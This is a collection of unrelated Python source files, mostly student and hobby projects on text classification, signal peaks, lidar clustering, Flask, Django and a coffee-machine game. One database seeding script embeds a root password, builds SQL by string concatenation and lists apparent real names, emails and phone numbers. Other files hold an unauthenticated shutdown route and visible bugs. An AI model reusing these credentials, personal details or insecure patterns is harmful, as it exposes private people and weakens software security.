0000000000000000
"""
)
def test_periodic_domain():
nx, ny = EXAMPLE_MASK.shape
mask_periodic = make_periodic_mask(EXAMPLE_MASK, object_connectivity=1)
assert mask_periodic.shape == (nx * 2, ny * 2)
np.testing.assert_equal(mask_periodic, EXAMPLE_MASK_DOUBLED)
|
"""
Brenna Carver & Cece Tsui
CS349 Final Project
Spring 2017
"""
from sklearn.feature_extraction.text import TfidfVectorizer
import json
import numpy as np
def getAverageRatings(filename, type):
''' Returns a dictionary consisting of user or business ids as keys and average rating
as values '''
ratingDict = {}
#According to type, refer to the corresponding keys
stars = "stars"
obj_id = "business_id"
if type=="user":
stars = "average_stars"
obj_id = "user_id"
with open(filename, "r") as f:
jsonobj = json.load(f)
for line in f:
obj = json.loads(line)
#Associate the id of the business/user to their average rating
ratingDict[obj[obj_id]] = obj[stars]
return ratingDict
def splitData(filename):
'''Takes in a filename where the file contains all data in the form of json. The function
splits all the data in the given file where 80% of the data is training data, 10% is development
and 10% is testing. Once split, the function writes the data into new files - "training.json",
"development.json", and "test.json" (Note we only looked at half of the data because
there was too much data and it was crashing out computers).'''
with open(filename) as f:
data = []
for obj in f:
data.append(json.loads(obj)) #Load each json object
#Calculate the number that shows 80/10 percent of 50% of the data
halfData = int(len(data)*.5)
eightper = int(halfData*.8)
tenper = int(halfData*.1)
#Split the data into train, development test
train = []
dev = []
test = []
counter = 0
for i in range(halfData):
if counter < eightper: #Take first 80% of the data for train
train.append(data[i])
elif counter < eightper+tenper: #Take the next 10% for development
dev.append(data[i])
else:
test.append(data[i]) #Take the final 10% for test
counter += 1
#Write the split data into their correlating files
with open("train.json", "w") as trainFile:
json.dump(train, trainFile)
with open("development.json", "w") as devFile:
json.dump(dev, devFile)
with open("test.json", "w") as testFile:
json.dump(test, testFile)
def getVocabulary(filename, mindf):
''' Returns a tuple consisting of the (1) list of text, (2) the text vector,
(3) the vote vector, (4) a tuple of the labels - one for logistic regression
and the other for linear regression.'''
reviewIndexDict = {} #{indexInMatrix: [useful, funny, cool]}
textList = []
labelList_log = []
labelList_lin = []
#counter = 0 #place of data in matrix
with open(filename) as f:
data = []
for line in f:
data += json.loads(line) #Load each JSON object
votes = np.zeros((len(data),3))
#Look through each JSON obj
for i in range(len(data)):
obj = data[i]
textList.append(obj.get("text", "")) #Create text List
#reviewIndexDict[counter] = [obj["useful"], obj["funny"], obj["cool"]]
#counter += 1 #next data
#Add to the vote vector
votes[i][0] = obj["useful"]
votes[i][1] = obj["funny"]
votes[i][2] = obj["cool"]
#Label of the current text list; linear regression will label based on 1-5 num scale
labelList_lin.append(int(obj["stars"]))
#Label for logisitc regressipn - binarize
label = 0 #0 for stars 1-3; "bad" review
if int(obj["stars"]) > 3: #1 for stars 4-5; "good" review
label = 1
labelList_log.append(label) #labels
print("Finished text list")
#Vectorize the text list to show tfidf values
vectorizer = TfidfVectorizer(strip_accents="unicode", min_df = mindf, lowercase = True, use_idf = True)
textX = vectorizer.fit(textList)
print("Finished vectorizing")
return (textList, textX, votes, (labelList_log, labelList_lin))
def getVotes(reviewIndexDict):
votes = np.zeros((len(reviewIndexDict),3))
for i in range(len(reviewIndexDict)):
for j in range(3):
votes[i][j] = reviewIndexDict[i][j]
return votes
|
MOD = int(1e9 + 7)
class Solution(object):
def findPaths(self, m, n, N, i, j):
dp = [{} for _ in range(N + 1)]
dp[0][(i, j)] = 1
dirs = [(0, 1), (0, -1), (1, 0), (-1, 0)]
ans = 0
for step in range(1, N + 1):
for r, c in dp[step - 1]:
# 前一个能抵达的状态
count = dp[step - 1][(r, c)]
for dr, dc in dirs:
nr, nc = dr + r, dc + c
# 出界了
if nr >= m or nc >= n or nr < 0 or nc < 0:
ans += count
ans %= MOD
# step能到达该地的其它方法
elif (nr, nc) in dp[step]:
dp[step][(nr, nc)] += count
# 第一次抵达
else:
dp[step][(nr, nc)] = count
return ans % MOD
|
from gdstorage.storage import GoogleDriveStorage, GoogleDrivePermissionType, \
GoogleDrivePermissionRole, GoogleDriveFilePermission
from django.conf import settings
if settings.GDRIVE_USER_EMAIL:
permission = GoogleDriveFilePermission(
GoogleDrivePermissionRole.READER,
GoogleDrivePermissionType.USER,
settings.GDRIVE_USER_EMAIL
)
else:
permission = GoogleDriveFilePermission(
GoogleDrivePermissionRole.READER,
GoogleDrivePermissionType.ANYONE
)
gd_storage = GoogleDriveStorage(permissions=(permission, ))
|
from __future__ import division
import hercubit
# import saved_data
import pickle
import sklearn
from sklearn import datasets, svm
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import pylab as pl
try:
import mpld3
from mpld3 import enable_notebook
from mpld3 import plugins
enable_notebook()
except Exception as e:
print "Attempt to import and enable mpld3 failed", e
# what would seaborn do?
try:
import seaborn as sns
except Exception as e:
print "Attempt to import and enable seaborn failed", e
# Attribution: https://gist.github.com/schlady/1576079
def peakdetect(y_axis, x_axis = None, lookahead = 500, delta = 0):
global np
"""
Converted from/based on a MATLAB script at http://billauer.co.il/peakdet.html
Algorithm for detecting local maximas and minmias in a signal.
Discovers peaks by searching for values which are surrounded by lower
or larger values for maximas and minimas respectively
keyword arguments:
y_axis -- A list containg the signal over which to find peaks
x_axis -- A x-axis whose values correspond to the 'y_axis' list and is used
in the return to specify the postion of the peaks. If omitted the index
of the y_axis is used. (default: None)
lookahead -- (optional) distance to look ahead from a peak candidate to
determine if it is the actual peak (default: 500)
'(sample / period) / f' where '4 >= f >= 1.25' might be a good value
delta -- (optional) this specifies a minimum difference between a peak and
the following points, before a peak may be considered a peak. Useful
to hinder the algorithm from picking up false peaks towards to end of
the signal. To work well delta should be set to 'delta >= RMSnoise * 5'.
(default: 0)
Delta function causes a 20% decrease in speed, when omitted
Correctly used it can double the speed of the algorithm
return -- two lists [maxtab, mintab] containing the positive and negative
peaks respectively. Each cell of the lists contains a tupple of:
(position, peak_value)
to get the average peak value do 'np.mean(maxtab, 0)[1]' on the results
"""
maxtab = []
mintab = []
dump = [] #Used to pop the first hit which always if false
length = len(y_axis)
if x_axis is None:
x_axis = range(length)
#perform some checks
if length != len(x_axis):
raise ValueError, "Input vectors y_axis and x_axis must have same length"
if lookahead < 1:
raise ValueError, "Lookahead must be above '1' in value"
if not (np.isscalar(delta) and delta >= 0):
raise ValueError, "delta must be a positive number"
#needs to be a numpy array
y_axis = np.asarray(y_axis)
#maxima and minima candidates are temporarily stored in
#mx and mn respectively
mn, mx = np.Inf, -np.Inf
#Only detect peak if there is 'lookahead' amount of points after it
for index, (x, y) in enumerate(zip(x_axis[:-lookahead], y_axis[:-lookahead])):
if y > mx:
mx = y
mxpos = x
if y < mn:
mn = y
mnpos = x
####look for max####
if y < mx-delta and mx != np.Inf:
#Maxima peak candidate found
#look ahead in signal to ensure that this is a peak and not jitter
if y_axis[index:index+lookahead].max() < mx:
maxtab.append((mxpos, mx))
dump.append(True)
#set algorithm to only find minima now
mx = np.Inf
mn = np.Inf
## Morgan's addition
y
####look for min####
if y > mn+delta and mn != -np.Inf:
#Minima peak candidate found
#look ahead in signal to ensure that this is a peak and not jitter
if y_axis[index:index+lookahead].min() > mn:
mintab.append((mnpos, mn))
dump.append(False)
#set algorithm to only find maxima now
mn = -np.Inf
mx = -np.Inf
#Remove the false hit on the first value of the y_axis
try:
if dump[0]:
maxtab.pop(0)
#print "pop max"
else:
mintab.pop(0)
#print "pop min"
del dump
except IndexError:
#no peaks were found, should the function return empty lists?
pass
return maxtab, mintab
def remap(peaks):
"""Reformat coordinates of peaks to properly feed into pyplot"""
tabs=[]
for tab in peaks: #mintab and maxtab
tab=([i[1] for i in tab],[i[0] for i in tab])
tabs.append(tab)
return tabs
def get_peaks(df_x,sensor='acc',mylookahead=10, delta=""):
peak_dict={}
ranges={}
times={}
if sensor=="acc": axes=list(df_x.columns[4:7])
if sensor=="gyro": axes=list(df_x.columns[7:10])
if sensor=="magnet": axes=list(df_x.columns[10:13])
for axis in axes:
peaks=peakdetect(df_x[axis],df_x['t (sec)'], lookahead=mylookahead,delta=delta)
peaks=remap(peaks)
print "%d local min, %d local max found on %s axis" % (len(peaks[1][0]),len(peaks[0][0]),axis)
times[axis] = [i[1] for i in peaks]
return times
|
# -*- coding: utf-8 -*-
# To change this template, choose Tools | Templates
# and open the template in the editor.
import memcache
def getCache():
return memcache.Client(['127.0.0.1:11211'],debug=0)
|
from arago.actors import Router
class ShortestQueueRouter(Router):
"""Routes received messages to the child with the lowest number of enqueued tasks"""
def _route(self, msg):
# Try to simply find a free worker, first
for item in self._children:
if hasattr(item, "_busy") and not item._busy:
return item
# If all workers are busy, order them by queue length and return the first
# FIXME: Can probably be optimized by not sorting the whole list
item = sorted(self._children, key=lambda item: len(item._mailbox), reverse=False)[0]
return item
|
#!/usr/bin/env python2.7
# -*- coding: UTF-8 -*-
import SimpleHTTPServer
import SocketServer
IP = "0.0.0.0"
PORT = 8000
def main():
Handler = SimpleHTTPServer.SimpleHTTPRequestHandler
httpd = SocketServer.TCPServer((IP, PORT), Handler)
print "serving at port", PORT
httpd.serve_forever()
if __name__ == "__main__":
main()
|
from flask import Flask
from be.view import auth, order, goods
from flask import Blueprint
from flask import request
import logging
bp_shutdown = Blueprint("shutdown", __name__)
def shutdown_server():
func = request.environ.get("werkzeug.server.shutdown")
if func is None:
raise RuntimeError("Not running with the Werkzeug Server")
func()
@bp_shutdown.route("/shutdown")
def be_shutdown():
shutdown_server()
return "Server shutting down..."
def be_run():
logging.basicConfig(filename="app.log", level=logging.ERROR)
app = Flask(__name__)
app.register_blueprint(bp_shutdown)
app.register_blueprint(auth.bp_auth)
app.register_blueprint(order.bp_order)
app.register_blueprint(goods.bp_goods)
app.run()
|
from django.apps import AppConfig
class PdfwebsiteConfig(AppConfig):
name = 'pdfwebsite'
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from PyQt5 import QtCore, QtGui, QtWidgets
from PyQt5.QtCore import pyqtSignal
class progressWidget(QtWidgets.QDialog):
progressClosed = pyqtSignal(int, name='progressClosed')
def __init__(self):
QtWidgets.QDialog.__init__(self)
#self.setAttribute()
self.initUI()
def initUI(self):
self.progress = QtWidgets.QProgressBar(self)
self.progress.setGeometry(0, 0, 250, 20)
self.progress.setValue(0)
self.directory = QtWidgets.QLabel('Directory', self)
#self.directory.move(0, 30)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Expanding)
sizePolicy.setHorizontalStretch(100)
sizePolicy.setVerticalStretch(0)
self.directory.setSizePolicy(sizePolicy)
self.directory.setGeometry(0, 30, 250, 20)
self.show()
def setValue(self,value):
self.progress.setValue(value)
self.setWindowTitle(str(value)+"%")
def setDirectoryText(self,value):
self.directory.setText(value)
def closeEvent(self,event):
print("progressClosed=OnClose")
self.progressClosed.emit(0)
self.close()
event.accept()
|
class Player(object):
def __init__(self, name, cup=None):
self.name = name
self.cup = cup
|
import math
class Point:
def reset(self):
self.x = 0
self.y = 0
def move(self,x=0,y=0):
self.x = x
self.y = y
def calc_distance(self,anotherpoint):
return math.sqrt((self.x -anotherpoint.x)**2 + (self.y - anotherpoint.y)**2)
p1 = Point()
p2 = Point()
p1.reset()
p2.move(3,4)
print(p1.calc_distance(p2))
|
# A program that indexes the supplied corpus of documents and then iteratively asks for
# search queries and provides results (as a list of file paths). If the search query contains
# more than one word, consider this to be a Boolean AND query.
from CONST import *
from Directory_Listing import ListFiles
from File_Reading import GetFileContents
from Tokenization import GenerateTokens
from Linguistic_Modules import LingModule, LingStr
from Sorting_Tokens import SortTokens
from Transformation_Postings import TransformationIntoPostings
from Postings_List_Merge import PostingListMerge
import time
import os
#from Get_Memory_Req import GetMemory
if __name__ == "__main__":
pid = os.getpid()
pyname = os.path.basename(__file__)
start = time.time()
# Directory Listing
all_files = ListFiles(rootDir)
all_token_pairs = []
for file in all_files:
# File Reading
file_text = GetFileContents(file)
# Tokenization
token_pairs = GenerateTokens(file_text, file)
# Linguistic Modules
modified_token_pairs = LingModule(token_pairs)
all_token_pairs += modified_token_pairs
del file_text
del token_pairs
del modified_token_pairs
# Sorting the Tokens
sorted_tokens = SortTokens(all_token_pairs)
del all_token_pairs
# Transformation into Postings
#m_s = GetMemory(pid,pyname)
posting_list = TransformationIntoPostings(sorted_tokens)
#m_e = GetMemory(pid,pyname)
time_index = (time.time() - start)*1000
del sorted_tokens
print("Time for creating index:\t", time_index, "ms")
##print("Memory for the index:\t", m_e - m_s, "KB")
while True:
query = input()
q_start = time.time()
queries = query.split()
queries = [LingStr(item) for item in queries]
try:
if len(queries) < 2:
length, fileList = posting_list[LingStr(query)]
print(fileList)
else:
print(PostingListMerge([posting_list[item] for item in queries]))
except BaseException:
print([])
q_time = (time.time() - q_start)*1000
print("Time for this query:\t", q_time, "ms")
|
from flask import Flask, render_template
from flaskext.mysql import MySQL
from werkzeug import generate_password_hash,check_password_hash
app = Flask(__name__)
mysql = MySQL()
app.config['MYSQL_DATABASE_USER'] = 'root'
app.config['MYSQL_DATABASE_PASSWORD'] = 'seproject'
app.config['MYSQL_DATABASE_DB'] = 'IMS_DB1'
app.config['MYSQL_DATABASE_HOST'] = 'localhost'
mysql.init_app(app)
conn = mysql.connect()
cursor = conn.cursor()
if __name__ == "__main__" :
password = "admin123"
hashed_password = generate_password_hash(password)
cursor.execute("insert into Customer (customer_id, user_name,hashed_password, email_id, phone_no,company_name) values(NULL,\"Sanjay \",\""+ str(hashed_password) +"\",\"sanjay.yoshimitsu@gmail.com\",\"7829373542\", \"PESU\");")
conn.commit()
cursor.execute("insert into Customer (customer_id, user_name,hashed_password, email_id, phone_no,company_name) values(NULL,\"Shruthi S \",\""+ str(hashed_password) +"\",\"shruthi.shankar2512@gmail.com\",\"9686511872\", \"PESU\");")
conn.commit()
cursor.execute("insert into Customer (customer_id, user_name,hashed_password, email_id, phone_no,company_name) values(NULL,\"Sai Shashank \",\""+ str(hashed_password) +"\",\"sai.sasank.yadati@gmail.com\",\"8861219216\", \"PESU\");")
conn.commit()
cursor.execute("insert into Customer (customer_id, user_name,hashed_password, email_id, phone_no,company_name) values(NULL,\"RM Sourabh\",\""+ str(hashed_password) +"\",\"sourabhraja97@gmail.com\",\"9880125575\", \"PESU\");")
conn.commit()
cursor.execute("insert into Customer (customer_id, user_name,hashed_password, email_id, phone_no,company_name) values(NULL,\"Sandeep S\",\""+ str(hashed_password) +"\",\"sandeepsandy.pes@gmail.com\",\"9886943287\", \"PESU\");")
conn.commit()
cursor.execute("insert into Customer (customer_id, user_name,hashed_password, email_id, phone_no,company_name) values(NULL,\"Sanat B\",\""+ str(hashed_password) +"\",\"sanathbhimsen26@gmail.com\",\"9740091229\", \"PESU\");")
conn.commit()
cursor.execute("insert into Customer (customer_id, user_name,hashed_password, email_id, phone_no,company_name) values(NULL,\"Raghavendra H\",\""+ str(hashed_password) +"\",\"raghavendrahegde17@gmail.com\",\"9481159571\", \"PESU\");")
conn.commit()
cursor.execute("insert into Customer (customer_id, user_name,hashed_password, email_id, phone_no,company_name) values(NULL,\"Rekha R\",\""+ str(hashed_password) +"\",\"rekharenu2715@gmail.com\",\"9036360647\", \"PESU\");")
conn.commit()
cursor.execute("insert into Customer (customer_id, user_name,hashed_password, email_id, phone_no,company_name) values(NULL,\"Sameer S\",\""+ str(hashed_password) +"\",\"sam13kv@gmail.com\",\"9886943287\", \"PESU\");")
conn.commit()
cursor.execute("insert into Customer (customer_id, user_name,hashed_password, email_id, phone_no,company_name) values(NULL,\"Sanjuktha G\",\""+ str(hashed_password) +"\",\"sanjukthaps@gmail.com\",\"9964054600\", \"PESU\");")
conn.commit()
cursor.execute("insert into Customer (customer_id, user_name,hashed_password, email_id, phone_no,company_name) values(NULL,\"Sai Bhavana\",\""+ str(hashed_password) +"\",\"sai.bhavana.ambati@gmail.com\",\"9890243965\", \"PESU\");")
conn.commit()
|
# usage:
# results = analyze_free_exploration(filename='bag_free_17.txt')
#
# returns a dictionary, results:
# results = {
# 'pre': { # in the pre-app
# 't0': 0, # time from start of app to first child action
# 'total_duration': 0, # total duration of audio played
# 'multi_entropy': 0 # entropy of character selection
# },
# 'post': { # in the post-app
# 't0': 0,
# 'total_duration': 0,
# 'multi_entropy': 0
# }
# }
import ast
from datetime import datetime
import numpy as np
import os
def get_headers():
return ['subject_id', 'pre_t0', 'pre_total_duration', 'pre_multi_entropy', 'post_t0', 'post_total_duration', 'post_multi_entropy']
def analyze_result(filename, pathname='./processed_data/txt/'):
data = {'pre': {}, 'post': {}}
with open(os.path.join(pathname,filename), 'r') as fp:
for line in fp:
dic = ast.literal_eval(line[6:])
if len(dic['comment'])>0:
if dic['obj'] == 'start_button_pre':
current_game = 'pre'
data['pre']['start'] = datetime.strptime(dic['time'], '%Y_%m_%d_%H_%M_%S_%f')
if dic['obj'] == 'start_button_post':
current_game = 'post'
data['post']['start'] = datetime.strptime(dic['time'], '%Y_%m_%d_%H_%M_%S_%f')
if dic['action'] == 'play':
try:
data[current_game]['sequence'].append(dic['obj'])
except:
data[current_game]['sequence'] = [dic['obj']]
try:
data[current_game][dic['comment']]['start'] =\
datetime.strptime(dic['time'], '%Y_%m_%d_%H_%M_%S_%f')
except:
data[current_game][dic['comment']] = {
'start': datetime.strptime(dic['time'], '%Y_%m_%d_%H_%M_%S_%f')}
elif dic['action'] == 'stop':
try:
data[current_game][dic['comment']]['stop'] =\
datetime.strptime(dic['time'], '%Y_%m_%d_%H_%M_%S_%f')
except:
data[current_game][dic['comment']] = {
'stop': datetime.strptime(dic['time'], '%Y_%m_%d_%H_%M_%S_%f')}
for p in data['pre'].values():
try:
p['duration'] = p['stop'] - p['start']
except:
pass
for p in data['post'].values():
try:
p['duration'] = p['stop'] - p['start']
except:
pass
# calculating results:
results = {
'pre': { # in the pre-app
't0': 0, # time from start of app to first child action
'total_duration': 0, # total duration of audio played
'multi_entropy': 0 # entropy of character selection
},
'post': { # in the post-app
't0': 0,
'total_duration': 0,
'multi_entropy': 0
}
}
# calculate t0: time from start to first character movement
pre_first_t0 = None
post_first_t0 = None
for p in data['pre'].values():
try:
if pre_first_t0 is None:
pre_first_t0 = p['start']
else:
pre_first_t0 = min([pre_first_t0, p['start']])
except:
pass
for p in data['post'].values():
try:
if post_first_t0 is None:
post_first_t0 = p['start']
else:
post_first_t0 = min([post_first_t0, p['start']])
except:
pass
try:
results['pre']['t0'] = (pre_first_t0 - data['pre']['start']).total_seconds()
results['post']['t0'] = (post_first_t0 - data['post']['start']).total_seconds()
except:
pass
# calculate total_duration: total time that had playing sound
for p in data['pre'].values():
try:
results['pre']['total_duration'] += p['duration'].total_seconds()
except:
pass
for p in data['post'].values():
try:
results['post']['total_duration'] += p['duration'].total_seconds()
except:
pass
# calculate multi_entropy: the entropy of the different characters
try:
results['pre']['multi_entropy'] = sequence_entropy(data['pre']['sequence'])
results['post']['multi_entropy'] = sequence_entropy(data['post']['sequence'])
except:
pass
#print(results)
#convert dictionary to list:
result_list = []
subject_id = filename.replace('bag_free_test','')
subject_id = subject_id.replace('.txt','')
result_list.append(subject_id)
result_list.append(results['pre']['t0'])
result_list.append(results['pre']['total_duration'])
result_list.append(results['pre']['multi_entropy'])
result_list.append(results['post']['t0'])
result_list.append(results['post']['total_duration'])
result_list.append(results['post']['multi_entropy'])
return result_list
def sequence_entropy(sequence):
characters = list(set(sequence))
num_characters = len(characters)
sequence_length = len(sequence)
prob = np.zeros([num_characters])
for c in sequence:
prob[characters.index(c)] += 1.0 / float(sequence_length)
entropy = 0.0
for p in prob:
entropy -= p * np.log2(p)
return entropy
results = analyze_result('bag_free_p044.txt','./results/txt/')
print(results)
|
# Copyright 2021 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from dataclasses import dataclass
from pants.backend.shell.lint.shfmt.skip_field import SkipShfmtField
from pants.backend.shell.lint.shfmt.subsystem import Shfmt
from pants.backend.shell.target_types import ShellSourceField
from pants.core.goals.fmt import FmtResult, FmtTargetsRequest
from pants.core.util_rules.config_files import ConfigFiles, ConfigFilesRequest
from pants.core.util_rules.external_tool import DownloadedExternalTool, ExternalToolRequest
from pants.core.util_rules.partitions import PartitionerType
from pants.engine.fs import Digest, MergeDigests
from pants.engine.platform import Platform
from pants.engine.process import Process, ProcessResult
from pants.engine.rules import Get, MultiGet, collect_rules, rule
from pants.engine.target import FieldSet, Target
from pants.util.logging import LogLevel
from pants.util.strutil import pluralize
@dataclass(frozen=True)
class ShfmtFieldSet(FieldSet):
required_fields = (ShellSourceField,)
sources: ShellSourceField
@classmethod
def opt_out(cls, tgt: Target) -> bool:
return tgt.get(SkipShfmtField).value
class ShfmtRequest(FmtTargetsRequest):
field_set_type = ShfmtFieldSet
tool_subsystem = Shfmt
partitioner_type = PartitionerType.DEFAULT_SINGLE_PARTITION
@rule(desc="Format with shfmt", level=LogLevel.DEBUG)
async def shfmt_fmt(request: ShfmtRequest.Batch, shfmt: Shfmt, platform: Platform) -> FmtResult:
download_shfmt_get = Get(
DownloadedExternalTool, ExternalToolRequest, shfmt.get_request(platform)
)
config_files_get = Get(
ConfigFiles, ConfigFilesRequest, shfmt.config_request(request.snapshot.dirs)
)
downloaded_shfmt, config_files = await MultiGet(download_shfmt_get, config_files_get)
input_digest = await Get(
Digest,
MergeDigests(
(request.snapshot.digest, downloaded_shfmt.digest, config_files.snapshot.digest)
),
)
argv = [
downloaded_shfmt.exe,
"-l",
"-w",
*shfmt.args,
*request.files,
]
result = await Get(
ProcessResult,
Process(
argv=argv,
input_digest=input_digest,
output_files=request.files,
description=f"Run shfmt on {pluralize(len(request.files), 'file')}.",
level=LogLevel.DEBUG,
),
)
return await FmtResult.create(request, result)
def rules():
return [
*collect_rules(),
*ShfmtRequest.rules(),
]
|
from django.db import models
class Article(models.Model):
title = models.CharField(max_length=100)
author = models.CharField(max_length=100)
email = models.EmailField(max_length=100)
date = models.DateTimeField(auto_now_add=True)
def __str__(self):
return self.title
class Employee(models.Model):
fullname = models.CharField(null=True, max_length=100)
emp_code = models.CharField(null=True, max_length=3)
mobile = models.CharField(null=True, max_length=15)
|
import pandas as pd
import math
RESULT_CSV_RAW_PATH = "D:/kostya_work/runtime-New_configuration/TestProject/experiments/Bengali_0_01/predictions/validation0.[0]-pr.csv"
DST_PATH = "D:/kostya_work/runtime-New_configuration/TestProject/experiments/Bengali_0_01/predictions/validation0.[0]-pr-submission.csv"
srcDF = pd.read_csv(RESULT_CSV_RAW_PATH)
ids = srcDF['image_id']
l = len(ids)
items = []
rowIDs = set()
for rec in srcDF.items():
cTitle = rec[0]
if cTitle == 'image_id':
continue
series = rec[1]
for i in range(l):
imId = ids[i]
rowId = f"{imId}_{cTitle}"
val = series[i]
if isinstance(val, float):
if math.isnan(val):
val = '0'
else:
val = str(int(val))
elif isinstance(val, int):
val = str(val)
items.append({
'row_id': rowId,
'target': val
})
rowIDs.add(rowId)
prefLen = len("Train_")
def itemKey(x):
s = x['row_id'][prefLen:]
sep = s.index('_')
ind = int(s[:sep])
gr = s[sep + 1:]
res = 0
if gr == 'grapheme_root':
res = 1
elif gr == 'vowel_diacritic':
res = 2
return ind * 3 + res
sortedItems = sorted(items, key=itemKey)
submissionDF = pd.DataFrame(sortedItems, columns=['row_id', 'target'])
submissionDF.to_csv(DST_PATH,index=False)
|
from art import logo
import time
MENU = {
"espresso": {
"ingredients": {
"water": 50,
"milk": 0,
"coffee": 18,
},
"cost": 1.5,
},
"latte": {
"ingredients": {
"water": 200,
"milk": 150,
"coffee": 24,
},
"cost": 2.5,
},
"cappuccino": {
"ingredients": {
"water": 250,
"milk": 100,
"coffee": 24,
},
"cost": 3.0,
}
}
resources = {
"water": 1000,
"milk": 1000,
"coffee": 1000,
"money":0,
}
def print_report():
print(f"Water: {resources['water']}ml\nMilk: {resources['milk']}ml\nCoffee: {resources['coffee']}g\nMoney: ${'{:.2f}'.format(resources['money'])}")
def print_menu():
print("######MENU#######")
print(f"Espresso: ${'{:.2f}'.format(MENU['espresso']['cost'])}\nLatte: ${'{:.2f}'.format(MENU['latte']['cost'])}\nCappuccino: ${'{:.2f}'.format(MENU['cappuccino']['cost'])}")
print("#################\n")
def insert_coins(choice):
print(f"The {choice} is ${'{:.2f}'.format(MENU[choice]['cost'])}. Please insert coins.")
q = input("How many quarters?")
d = input("How many dimes?")
n = input("How many nickles?")
p = input("How many pennies?")
if q == '':
q = 0
if d == '':
d = 0
if n == '':
n = 0
if p == '':
p = 0
total = float((int(q) * .25) + (int(d) * .10) + (int(n) * .05) + (int(p) * .01))
if total >= MENU[choice]['cost']:
change = "{:.2f}".format(total - float(MENU[choice]['cost']))
print(f"Your change is ${change}! Enjoy your {choice}!")
return True
else:
print("You didn't insert enough coins. Refunding money")
return False
def check_resources(choice):
# if resources['milk'] >= MENU[choice]['ingredients']['milk'] \
# and resources['water'] >= MENU[choice]['ingredients']['water'] \
# and resources['coffee'] >= MENU[choice]['ingredients']['coffee']:
if resources['milk'] >= MENU[choice]['ingredients']['milk']:
if resources['water'] >= MENU[choice]['ingredients']['water']:
if resources['coffee'] >= MENU[choice]['ingredients']['coffee']:
return True
else:
print("Sorry, not enough Coffee")
return False
else:
print("Sorry, not enough water")
return False
else:
print("Sorry, not enough milk")
return False
def adjust_resources(choice):
resources['milk'] = resources['milk'] - MENU[choice]['ingredients']['milk']
resources['coffee'] = resources['coffee'] - MENU[choice]['ingredients']['coffee']
resources['water'] = resources['water'] - MENU[choice]['ingredients']['water']
resources['money'] += MENU[choice]['cost']
quit = True
while(quit):
print(logo)
print_menu()
choice = input("What would you like?").lower()
if choice == "report":
print_report()
time.sleep(3)
print('\n' * 40)
elif choice == "off":
print("Shutting Down Coffee Maker!")
quit = False
elif check_resources(choice):
if insert_coins(choice):
adjust_resources(choice)
time.sleep(3)
print('\n' * 40)
quit = True
else:
time.sleep(3)
print('\n' * 40)
quit = True
else:
time.sleep(3)
print('\n' * 40)
uit = True
|
import numpy as np
import matplotlib.pyplot as plt
import mpl_toolkits.mplot3d.axes3d as p3
from sklearn.cluster import MeanShift, estimate_bandwidth
from sklearn.datasets.samples_generator import make_blobs
#########################
fig = plt.figure()
ax = p3.Axes3D(fig)
'''
ax.set_xlabel('X')
ax.set_ylabel('Y')
ax.set_zlabel('Z')
ax.set_xlim3d([-4000,100])
ax.set_ylim3d([-15000,1500])
ax.set_zlim3d([-500,500])
'''
#plt.show()
##############################
#############################################
dataID=0x96
chksum=0;
angle=[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0]
theta=[-15,-13,-11,-9,-7,-5,-4,-3,-2,-1,0,1,3,5,7,9]
theta_degree=np.multiply(theta,np.pi/180)
rangeOne=[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0]
rangeTwo=[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0]
x_all=np.zeros(3600*16)
y_all=np.zeros(3600*16)
z_all=np.zeros(3600*16)
###########################################
f=open('change_axis.pcapng','rb')
data=f.read()
data = bytearray(data)
packetIndex=-1;
count=0;
a=np.arange(-1600,1000)
b=np.zeros(len(a))
b2=np.zeros(len(a))
for l in range(np.size(a)):
b[l]=-(3*a[l])-2350 #lower line
b2[l]=-(3*a[l])+900 #higher
for i in range(np.size(data)):
if i<packetIndex:
continue
if(data[i]==dataID):
chksum=0
for j in range(i+2, i+2+136):
chksum=chksum+data[j]
if ((chksum&0xFF)==data[i+1]):
for k in range(0,16):
angle[k]=((data[i+11+8*k]<<8)+data[i+10+8*k])*0.01
rangeOne[k]=((data[i+13+8*k]<<8)+data[i+12+8*k])
rangeTwo[k]=((data[i+15+8*k]<<8)+data[i+14+8*k])
angle_degree=np.multiply(angle,np.pi/180)
xy=np.multiply(rangeOne,np.cos(theta_degree))
x=np.multiply(xy,np.cos(angle_degree))
y=-np.multiply(xy,np.sin(angle_degree))
z=np.multiply(rangeOne,np.sin(theta_degree))
if(count<3600):
x_all[count*16:(count+1)*16]=x
y_all[count*16:(count+1)*16]=y
z_all[count*16:(count+1)*16]=z
count=count+1
packetIndex=i+138
if(count==3600):
count=0
mask=(3*x_all+ y_all>-2350) & (3*x_all+y_all<800) & (z_all>0)
x_mask=x_all[mask]
y_mask=y_all[mask]
z_mask=z_all[mask]
dstack=[[]]
dstack=np.dstack((x_mask,y_mask,z_mask)).tolist()
dstack=dstack[0]
#print type (dstack)
centers=dstack
#print type (centers)
X, _ = make_blobs(n_samples=10000, centers=centers, cluster_std=0.6)
# #############################################################################
# Compute clustering with MeanShift
# The following bandwidth can be automatically detected using
bandwidth = estimate_bandwidth(X, quantile=0.5, n_samples=50)
ms = MeanShift(bandwidth=bandwidth, bin_seeding=True)
ms.fit(X)
labels = ms.labels_
cluster_centers = ms.cluster_centers_
#print cluster_centers
#print type(cluster_centers)
labels_unique = np.unique(labels)
n_clusters_ = len(labels_unique)
#print cluster_centers[0]
#print type(cluster_centers[0])
#print cluster_centers[0].size
#print("number of estimated clusters : %d" % n_clusters_)
# #############################################################################
# Plot result
import matplotlib.pyplot as plt
from itertools import cycle
colors = cycle('bgrcmykbgrcmykbgrcmykbgrcmyk')
cluster_members_x=[]
cluster_members_y=[]
cluster_members_z=[]
cluster_center_x=[]
cluster_center_y=[]
cluster_center_z=[]
color_array=[]
color=[]
for k, col in zip(range(n_clusters_), colors):
#cluster_center_x=[]
cluster_center_x.append(0)
cluster_center_y.append(0)
cluster_center_z.append(0)
#print k,(cluster_center_x)
my_members = labels == k
cluster_center = cluster_centers[k]
#ax.clear()
#print x
#ax.scatter(X[my_members, 0], X[my_members, 1],X[my_members, 2],s=0.5,c=col)
for m in range(len(X[my_members,0])):
color.extend(col)
#print len(X[my_members, 0])
#print type(X[my_members, 0])
